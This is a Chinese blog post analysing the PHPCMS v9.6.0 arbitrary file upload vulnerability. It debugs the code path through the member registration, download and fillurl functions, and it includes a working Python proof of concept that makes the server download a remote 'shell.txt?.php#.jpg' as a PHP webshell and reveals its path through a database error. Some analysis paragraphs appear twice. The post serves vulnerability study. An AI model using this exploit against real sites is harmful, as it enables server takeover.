您现在的位置是:首页 > cms教程 > phpcms教程phpcms教程
PHPCMSv9.6.0任意文件上传漏洞分析
紫山2025-06-05phpcms教程已有人查阅
导读配置phpdebug的环境,并且根据这篇文章把流程走了一遍,对phpstorm的debug熟练度+1(跟pycharm一样)用户名和email都要随便生成,因为注册名不能相同
配置phpdebug的环境,并且根据这篇文章把流程走了一遍,对phpstorm的debug熟练度+1(跟pycharm一样)用户名和email都要随便生成,因为注册名不能相同,所以修改了下脚本。
根据post提交的参数,问题出现在/phpcms/modules/member/index.php的文件中,可以知道是在register函数中,所以在info[content] 下断点。
打开phpstorm的右上角,进入监听模式,这时候访问网站是非常慢的。
执行一遍poc,跟进get函数 位于 /caches/caches_model/caches_data/member_input.class.php
可以看到
执行下来$value的值不变,进入download函数。
位于/phpcms/libs/classes/attachment.class.php 第143-187行。
大概就是根据日期创建文件夹然后判断://是否存在,接着跟进到fillurl函数, 位于/phpcms/libs/classes/attachment.class.php 位于280-344行。
这样就获取到shell了,在根据seebug的内容分析。
程序在下载之后回到了register函数中,(ps:用他的图片)
第150行处有个数据库相关的insert操作,将$userid加到$user_model_info数组里再进行数据库的插入操作(会员新增操作,对应的v9_member_detail数据表),先看下v9_member_detail的表结构:
只有userid和birthday字段,但由于$user_model_info数组已经包含了我们之前构造提交的info[content]=xxxxxx的内容,而在插入数据库的时候又没有content字段,所以会导致数据库报错,从而将我们构造的xxxxxx的内容给回显出来,所以就不用 去破解文件名了。
import re
import requests
import sys
import random
def poc(url):
string=''
name = string.join(random.sample(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 10)).replace(" ", "")
u = '{}/index.php?m=member&c=index&a=register&siteid=1'.format(url)
data = {
'siteid': '1',
'modelid': '1',
'username': name,
'password': name+'1',
'email': name+'@test.com',
'info[content]': '<img src=http://url/shell.txt?.php#.jpg>',
'dosubmit': '1',
}
rep = requests.post(u, data=data)
shell = ''
re_result = re.findall(r'<img src=(.*)>', rep.content)
if len(re_result):
shell = re_result[0]
print shell
url=sys.argv[1]
poc(url)
查看帮助文档可以定位到具体的哪个文件 http://v9.help.phpcms.cn/html/2010/structure_0928/73.html根据post提交的参数,问题出现在/phpcms/modules/member/index.php的文件中,可以知道是在register函数中,所以在info[content] 下断点。
打开phpstorm的右上角,进入监听模式,这时候访问网站是非常慢的。
执行一遍poc,跟进get函数 位于 /caches/caches_model/caches_data/member_input.class.php
可以看到
$data => <img src=http://url/shell.txt?.php#.jpg>
这是最开始经过trim_script 的函数进行转码跟到48行左右,可以看到如下图,$func的值为editor,组成函数,继续下跟来到/caches/caches_model/caches_data/member_input.class.php 第59-67行。执行下来$value的值不变,进入download函数。
位于/phpcms/libs/classes/attachment.class.php 第143-187行。
大概就是根据日期创建文件夹然后判断://是否存在,接着跟进到fillurl函数, 位于/phpcms/libs/classes/attachment.class.php 位于280-344行。
function fillurl($surl, $absurl, $basehref = '')
$surl = http://url/shell.txt?.php#.jpg
$pos = strpos($surl,'#'); //strpos函数:查找字符串首次出现的位置,
if($pos>0) $surl = substr($surl,0,$pos); //返回$pos[0] 也就是http://url/shell.txt?.php
直接取后缀进行赋值,这时候的$filename的值是php,所以直接生成后缀为php的文件名,在进行copy操作。这样就获取到shell了,在根据seebug的内容分析。
程序在下载之后回到了register函数中,(ps:用他的图片)
第150行处有个数据库相关的insert操作,将$userid加到$user_model_info数组里再进行数据库的插入操作(会员新增操作,对应的v9_member_detail数据表),先看下v9_member_detail的表结构:
只有userid和birthday字段,但由于$user_model_info数组已经包含了我们之前构造提交的info[content]=xxxxxx的内容,而在插入数据库的时候又没有content字段,所以会导致数据库报错,从而将我们构造的xxxxxx的内容给回显出来,所以就不用 去破解文件名了。
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
相关教程
图文教程
phpcms配置邮箱的步骤教程
phpcms是一款网站管理软件。该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移
PHPCMSV9加载顺序代码介绍
打开根目录下面的index.php 三行代码,相比V8的 index.php来说 更加清楚,phpcms下面的base.php文件,是一个基础类,里面的功能类似于V8的common.inc.php
phpcms添加文章的方法
phpcms添加文章的方法:首先,在管理字段:relation 相关文章这里,可以看到下面这段代码:
phpcms模块显示无法安装的解决方法
phpcms模块显示无法安装怎么办新建PHPCMS V9模块的时候出现了这个问题此模块已禁用或未安装查看代码,没有发现问题,也更新了缓存,问题依旧
相关源码
-
html5响应式pbootcms模板新闻资讯博客网站源码该模板采用PbootCMS内核开发,专为新闻资讯类网站打造,同时具备高度行业适配性--只需替换图文内容即可快速转型为企业官网、行业门户等各类站点。查看源码 -
(自适应响应式)门窗定制门业带视频功能pbootcms模板下载本模板采用PbootCMS内核开发,为门窗制造、定制安装企业打造,通过可视化后台管理系统快速构建品牌官网。自适应设计确保在手机、平板、电脑等设备上均能获得优质浏览体验查看源码 -
(自适应响应式)环保净化器家用电器网站免费模板针对环保设备、环境监测等领域的PbootCMS响应式模板,通过模块化设计清晰展示污水处理技术、空气净化系统等解决方案。移动端呈现环保数据可视化图表,后端统一管理确保项目案例、技术等资料多端同步。查看源码 -
(PC+WAP)绿色日志美文文学说说博客网站pbootcms模板除日志博客类网站外,通过替换图文内容可快速适配:心情日记分享平台、文学创作社区、朋友圈内容聚合站、美文鉴赏网站、读书笔记平台等应用场景。查看源码 -
(自适应响应式)绿色环保防腐木材轻钢别墅建材pbootcms模板下载本模板为环保防腐木材、轻钢别墅建材类企业设计开发,基于PbootCMS内核构建,充分考虑了建材行业的展示需求与产品特点。模板设计风格自然环保,布局清晰合理,呈现建材产品特性与专业优势,帮助访客直观了解产品特点并建立信任感。查看源码 -
(PC+WAP)化工材料企业环保能源绿色营销型pbootcms模板源码下载本模板为化工材料及环保能源企业设计,采用PbootCMS开发,可展示各类化工产品、环保技术及能源解决方案。查看源码
| 分享笔记 (共有 篇笔记) |
